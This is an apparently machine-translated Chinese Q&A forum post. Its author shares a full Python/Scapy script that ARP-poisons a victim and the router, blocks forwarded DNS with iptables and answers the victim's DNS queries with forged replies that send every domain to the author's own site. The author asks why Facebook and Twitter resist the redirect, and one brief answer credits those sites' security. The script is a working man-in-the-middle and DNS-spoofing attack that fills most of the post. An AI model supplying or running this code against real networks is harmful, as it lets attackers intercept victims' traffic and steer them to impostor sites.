我在python中创建了一个DNF欺骗器(带有ARP中毒)只是为了好玩。我的目标只是将受害者的DNS请求重定向到我的网站。所以无论何时他们去任何网站,他们都会去我的网站。然而,它似乎只适用于某些网站而不是所有网站,当他们去Twitter或Facebook这样的网站时似乎没有用,但是当他们去google或更小的网站时,他们被重定向就好了吗?我也在我的代码中使用iptables规则阻止来自路由器的所有DNS。
任何人都知道为什么?
代码:
#command line arguments
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)
args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
localMAC = ""
victimMAC = ""
routerMAC = ""
#Setup function
def setup():
#setup forwarding rules
#disable forwarding of DNS requests to router
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
#iptables rule
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
#Flush iptables on exit
def reset():
Popen(["iptables -F"], shell=True, stdout=PIPE)
#get MACaddress of local machine
def getOurMAC(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = "00:00:00:00:00:00"
return mac[0:17]
#returns MAC address of victim IP
def getTargetMAC(IP):
#add the target to our system's ARP cache
pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
pid = Popen(["arp", "-n", IP], stdout=PIPE)
s = pid.communicate()[0]
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]
return MAC
#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
print str(vIP) + " has been poisoned."
while True:
try:
sendp(arpPacketVictim, verbose=0)
sendp(arpPacketRouter, verbose=0)
#pause between each send
time.sleep(3)
except KeyboardInterrupt:
sys.exit(0)
#construct and send a spoofed DNS response packet to the victim
def reply(packet):
global targetIP
responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
send(responsePacket, verbose=0)
print "Sent spoofed DNS Packet"
return
#this parse creates a thread
def parse(packet):
if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
replyThread = threading.Thread(target=reply, args=packet)
replyThread.start()
#initiate sniff filter for DNS requests
def DNSsniffer():
global vIP
print "Sniffing DNS"
sniffFilter = "udp and port 53 and src " +str(vIP)
sniff(filter=sniffFilter, prn=parse)
# main function
def main():
victimMAC = getTargetMAC(vIP)
localMAC = getOurMAC("eno1")#Datacomm card
routerMAC = getTargetMAC(routerIP)
#threads creation
ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
sniffThread = threading.Thread(target=DNSsniffer)
#
ARPThread.daemon = True
sniffThread.daemon = True
#
ARPThread.start()
sniffThread.start()
#Keyboard Interrupt
while True:
try:
time.sleep(5)
except KeyboardInterrupt:
reset()
print "Exiting"
sys.exit(0)
#--------------------------------------------------
setup()
main()
更新: 我做了一些进一步的测试,当受害者去谷歌这样的网站时,似乎重定向就好了。快速加载网站,但对于较大的网站,如Facebook或Twitter,它似乎永远加载。
而不是产生线程,我可以生成进程吗?
答案 0 :(得分:0)
事实证明,它只是Facebook和Twitter上的安全性阻止欺骗,我的代码没有任何问题。